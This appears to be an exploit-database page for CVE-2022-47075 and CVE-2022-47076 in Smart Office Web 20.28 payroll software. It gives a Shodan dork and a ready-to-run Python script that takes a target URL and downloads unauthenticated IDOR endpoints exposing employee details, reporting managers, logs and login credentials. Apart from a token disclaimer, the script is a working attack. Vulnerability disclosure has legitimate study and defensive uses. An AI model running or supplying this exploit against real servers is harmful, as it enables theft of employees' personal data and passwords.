Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated) Exploit

🗓️ 26 Jun 2023 00:00:00Reported by Tejas PingulkarType

zdt🔗 0day.today👁 276 Views

Smart Office Web 20.28 Remote Info Disclosure (Unauthenticated) Exploit by Tejas Nitin Pingulkar. Educational use only. Allows RIF or IDOR. Download files based on software version and website

Reporter	Title	Published	Views	Family All 20
Circl	CVE-2022-47075	14 May 202521:02	–	circl
CNNVD	SmartOffice 安全漏洞	28 Feb 202300:00	–	cnnvd
CNNVD	SmartOffice 安全漏洞	28 Feb 202300:00	–	cnnvd
CVE	CVE-2022-47075	28 Feb 202300:00	–	cve
CVE	CVE-2022-47076	28 Feb 202300:00	–	cve
Cvelist	CVE-2022-47075	28 Feb 202300:00	–	cvelist
Cvelist	CVE-2022-47076	28 Feb 202300:00	–	cvelist
Exploit DB	Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)	22 Jun 202300:00	–	exploitdb
Nuclei	Smart Office Web 20.28 - Information Disclosure	11 Jun 202603:33	–	nuclei
NVD	CVE-2022-47075	28 Feb 202323:15	–	nvd

# Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
# Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office"
# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)
# Vendor Homepage: https://smartofficepayroll.com/
# Software Link: https://smartofficepayroll.com/downloads
# Version: Smart Office Web 20.28 and before
# CVE Number : CVE-2022-47075 and CVE-2022-47076
# CVSS : 7.5 (High)
# Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/
# Vulnerability Description:
# Smart Office Web 20.28  and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails.

import wget
import os
from colorama import Fore, Style

def download_file(url, filename):
    wget.download(url, filename)

# Disclaimer
print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.")
print("The author takes no responsibility for any unauthorized usage.")
print("Please use this script responsibly and adhere to the legal and ethical guidelines.")

agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ")
if agree != "1":
    print("You have chosen not to agree. Exiting the script.")
    exit()

# Print name in red
name = "Exploit by Tejas Nitin Pingulkar"
print(Fore.RED + name)
print(Style.RESET_ALL)  # Reset color

website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ")
target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ")
folder_name = input("Enter the folder name to save the files: ")

# Create the folder if it doesn't exist
if not os.path.exists(folder_name):
    os.makedirs(folder_name)

urls_filenames = []

if target_version == "1":
    urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv"))
else:
    urls_filenames.extend([
        (website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"),
        (website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"),
        (website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"),
        (website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv")
    ])

print("CVE-2022-47076: Obtain user ID and password from downloaded source")

for url, filename in urls_filenames:
    download_file(url, os.path.join(folder_name, filename))

# Print "for more such interesting exploits, visit cvewalkthrough.com" in red
print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com")
print(Style.RESET_ALL)  # Reset color

26 Jun 2023 00:00Current

7.1High risk

Vulners AI Score7.1

CVSS 3.17.5

EPSS0.92051

SSVC